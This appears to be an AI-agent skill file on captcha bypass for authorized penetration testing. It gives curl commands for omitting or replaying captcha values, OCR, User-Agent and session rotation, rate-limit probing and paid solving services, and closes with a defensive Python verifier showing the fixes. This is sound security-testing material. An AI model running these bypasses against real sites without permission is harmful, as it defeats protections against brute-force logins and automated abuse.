---
name: captcha-bypass
description: Techniques for bypassing captchas during authorized security testing and penetration testing. Use this skill whenever you're testing web applications and encounter captcha challenges that need to be automated or bypassed for testing purposes. This includes penetration testing, security assessments, and authorized vulnerability scanning. Don't use this for unauthorized access or malicious purposes.
---

# Captcha Bypass Techniques

This skill provides techniques for bypassing captchas during **authorized security testing**. The goal is to streamline testing workflows, not to undermine security controls in production without authorization.

## When to Use This Skill

Use this skill when:

- You're conducting authorized penetration testing on web applications
- You need to automate security testing workflows that encounter captchas
- You're building security testing tools that need to handle captcha challenges
- You're assessing captcha implementation strength in a controlled environment

## Core Techniques

### 1. Parameter Manipulation

Try modifying how the captcha parameter is sent:

**Omit the captcha parameter entirely:**

```bash
# Remove captcha field from request
curl -X POST https://target.com/login \
  -d "username=test&password=secret"
```

**Change HTTP method:**

```bash
# Try GET instead of POST
curl -X GET "https://target.com/login?username=test&password=secret"
```

**Switch data format:**

```bash
# Try JSON instead of form data
curl -X POST https://target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":"test","password":"secret"}'
```

**Send empty captcha value:**

```bash
curl -X POST https://target.com/login \
  -d "username=test&password=secret&captcha="
```

### 2. Value Extraction and Reuse

**Search page source for captcha values:**

```bash
curl -s https://target.com/login | grep -i captcha
curl -s https://target.com/login | grep -oE '[a-zA-Z0-9]{8,}'
```

**Check cookies for stored values:**

```bash
curl -s -c cookies.txt -L https://target.com/login
grep -i captcha cookies.txt
```

**Reuse previous successful values:**

```bash
# Store and reuse captcha tokens
export CAPTCHA_TOKEN="abc123xyz"
curl -X POST https://target.com/login \
  -d "username=test&password=secret&captcha=$CAPTCHA_TOKEN"
```

**Test session reuse:**

```bash
# Use same session across requests
curl -c session.txt -b session.txt https://target.com/login
```

### 3. Mathematical Captcha Automation

For simple math captchas, automate the calculation:

```bash
# Extract and solve math captcha
# '-' must sit first or last inside the bracket expression; written as '[+\-*/]'
# grep reads it as a reversed range and aborts with "Invalid range end".
CAPTCHA_EXPR=$(curl -s https://target.com/captcha | grep -oE '[0-9]+\s*[-+*/]\s*[0-9]+' | head -n 1)
CAPTCHA_ANSWER=$(echo "$CAPTCHA_EXPR" | bc)
curl -X POST https://target.com/login \
  -d "username=test&password=secret&captcha=$CAPTCHA_ANSWER"
```

### 4. Image Recognition

**Count unique captcha images:**

```bash
# Download and hash images to find patterns
# Keep only the hash (not the filename) so identical images collapse under uniq -c
for i in {1..100}; do
  curl -s https://target.com/captcha.png -o captcha_$i.png
  md5sum captcha_$i.png | cut -d' ' -f1
done | sort | uniq -c | sort -rn
```

**Use OCR for text extraction:**

```bash
# Install tesseract first: apt install tesseract-ocr
curl -s https://target.com/captcha.png -o captcha.png
tesseract captcha.png stdout --psm 6
```

### 5. Rate Limit Testing

Check if rate limits can be bypassed:

```bash
# Test submission limits
for i in {1..10}; do
  curl -s -o /dev/null -w "%{http_code} " https://target.com/login \
    -d "username=test&password=secret&captcha=test"
  sleep 1
done
echo
```

### 6. Header and Session Manipulation

**Rotate User-Agents:**

```bash
USER_AGENTS=(
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0"
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1"
  "Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0"
)
for ua in "${USER_AGENTS[@]}"; do
  curl -A "$ua" https://target.com/login
done
```

**Session rotation:**

```bash
# Generate new session for each request
# ($$ is the PID of this shell, so run the snippet once per request to get a fresh cookie jar)
curl -c /tmp/session_$$.txt -b /tmp/session_$$.txt https://target.com/login
rm /tmp/session_$$.txt
```

### 7. Third-Party Services

For complex captchas (reCAPTCHA, Cloudflare, etc.), consider:

- **CapSolver**: AI-powered captcha solving API
- **2Captcha**: Human-powered solving service
- **Anti-Captcha**: Another solving service option

**Example API integration:**

```bash
# CapSolver example (requires API key)
curl -X POST https://api.capsolver.com \
  -H "Content-Type: application/json" \
  -d '{
    "clientKey": "YOUR_API_KEY",
    "task": {
      "type": "ReCaptchaV2Task",
      "websiteURL": "https://target.com",
      "websiteKey": "6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI"
    }
  }'
```

## Testing Workflow

1. **Document authorization** - Ensure you have written permission
2. **Start with parameter manipulation** - Easiest to implement
3. **Progress to automation** - Math, OCR, or services
4. **Test rate limits** - Understand constraints
5. **Document findings** - Report bypass methods found

## Output Format

When documenting captcha bypass findings, use this structure:

```
## Captcha Bypass Assessment

### Target
- URL: [target URL]
- Captcha Type: [reCAPTCHA v2/v3, image, math, etc.]

### Techniques Tested
- [x] Parameter omission
- [x] Empty value submission
- [x] Session reuse
- [ ] OCR automation
- [ ] Third-party services

### Results
- Bypassable: [Yes/No/Partial]
- Method: [description of successful technique]
- Risk Level: [Low/Medium/High]

### Recommendations
- [specific remediation steps]
```

## Important Notes

- **Authorization Required**: Only use these techniques on systems you own or have explicit permission to test
- **Rate Limiting**: Be respectful of target systems to avoid causing denial of service
- **Documentation**: Always document your testing scope and findings
- **Legal Compliance**: Ensure compliance with applicable laws and regulations

## Common Captcha Types

| Type | Difficulty | Recommended Approach |
|------|------------|----------------------|
| Math | Low | Automate calculation |
| Text Image | Medium | OCR or hash analysis |
| reCAPTCHA v2 | High | Third-party service |
| reCAPTCHA v3 | High | Third-party service |
| Cloudflare | Very High | Specialized tools |
| hCaptcha | High | Third-party service |
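The probes in sections 1, 2 and 5 (omitted or empty captcha parameter, replayed tokens, tokens reused across sessions, unlimited submissions) all succeed against the same server-side mistakes, and the "Recommendations" block above is where a tester has to describe the fix. The following Python is an added example, not code from this skill or from any service it names: a small verifier that closes each of those gaps, with the probes from those sections run against it so the expected rejection for each one is visible. `CaptchaVerifier`, `CaptchaChallenge`, `FakeClock`, the in-memory stores and all form values are assumptions constructed for the demo, not a real library or a real target.

```python
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, Tuple


@dataclass
class CaptchaChallenge:
    """One issued captcha: the expected answer stays server-side, bound to a session."""
    answer: str
    session_id: str
    issued_at: float


@dataclass
class CaptchaVerifier:
    """Hypothetical server-side verifier (an assumption for this example).

    A missing or empty captcha parameter is a failure, not a skipped check;
    tokens are single-use, bound to the issuing session, and expire; a session
    is locked after too many failed submissions.
    """
    ttl_seconds: float = 300.0
    max_failures: int = 5
    clock: Callable[[], float] = time.time
    challenges: Dict[str, CaptchaChallenge] = field(default_factory=dict)
    failures: Dict[str, int] = field(default_factory=dict)

    def issue(self, session_id: str, answer: str) -> str:
        """Create an unguessable token for a challenge whose answer is `answer`."""
        token = secrets.token_urlsafe(16)
        self.challenges[token] = CaptchaChallenge(answer, session_id, self.clock())
        return token

    def verify(self, session_id: str, form: Dict[str, str]) -> Tuple[bool, str]:
        """Check a submitted form. Returns (accepted, reason) and fails closed."""
        if self.failures.get(session_id, 0) >= self.max_failures:
            return False, "locked"
        token = form.get("captcha_token")
        answer = form.get("captcha")
        if not token or answer is None or answer == "":
            return self._fail(session_id, "missing")
        # pop() makes the token single-use: a replay sees an unknown token
        challenge = self.challenges.pop(token, None)
        if challenge is None:
            return self._fail(session_id, "unknown_or_reused")
        if challenge.session_id != session_id:
            return self._fail(session_id, "wrong_session")
        if self.clock() - challenge.issued_at > self.ttl_seconds:
            return self._fail(session_id, "expired")
        expected = challenge.answer.strip().lower().encode()
        given = answer.strip().lower().encode()
        if not hmac.compare_digest(expected, given):
            return self._fail(session_id, "wrong_answer")
        self.failures.pop(session_id, None)
        return True, "ok"

    def _fail(self, session_id: str, reason: str) -> Tuple[bool, str]:
        self.failures[session_id] = self.failures.get(session_id, 0) + 1
        return False, reason


class FakeClock:
    """Controllable clock so the demo can exercise expiry without sleeping."""
    def __init__(self, now: float = 1_000.0) -> None:
        self.now = now

    def __call__(self) -> float:
        return self.now


def demo() -> Dict[str, str]:
    """Run the section 1, 2 and 5 probes (constructed sample data) and collect each reason."""
    clock = FakeClock()
    v = CaptchaVerifier(clock=clock)
    out: Dict[str, str] = {}
    t = v.issue("sess-A", "7")
    # Section 1: omit the captcha, then send it empty
    out["omitted"] = v.verify("sess-A", {"username": "test", "password": "secret"})[1]
    out["empty"] = v.verify("sess-A", {"captcha_token": t, "captcha": ""})[1]
    # A correct first-time answer is accepted, and resets the failure counter
    out["correct"] = v.verify("sess-A", {"captcha_token": t, "captcha": "7"})[1]
    # Section 2: replaying the token, or presenting another session's token, is rejected
    out["replayed"] = v.verify("sess-A", {"captcha_token": t, "captcha": "7"})[1]
    t2 = v.issue("sess-A", "7")
    out["other_session"] = v.verify("sess-B", {"captcha_token": t2, "captcha": "7"})[1]
    # A stale token is rejected once the TTL has passed
    t3 = v.issue("sess-A", "7")
    clock.now += 600
    out["expired"] = v.verify("sess-A", {"captcha_token": t3, "captcha": "7"})[1]
    # Section 5: repeated failures lock the session, even for a later correct answer
    for _ in range(3):
        v.verify("sess-A", {"captcha_token": v.issue("sess-A", "7"), "captcha": "0"})
    out["locked"] = v.verify("sess-A", {"captcha_token": v.issue("sess-A", "7"), "captcha": "7"})[1]
    return out


if __name__ == "__main__":
    for probe, reason in demo().items():
        print(f"{probe:>14}: {reason}")
```

The design point is that every branch except the single success path consumes the token and counts a failure, so none of the section 1 and 2 probes can reach the credential check without a fresh, session-bound, unexpired token, and the section 5 loop hits the per-session lockout instead of an unbounded retry budget. In a real deployment the two dictionaries would live in a shared store with the session, and the lockout counter would also be applied per source address.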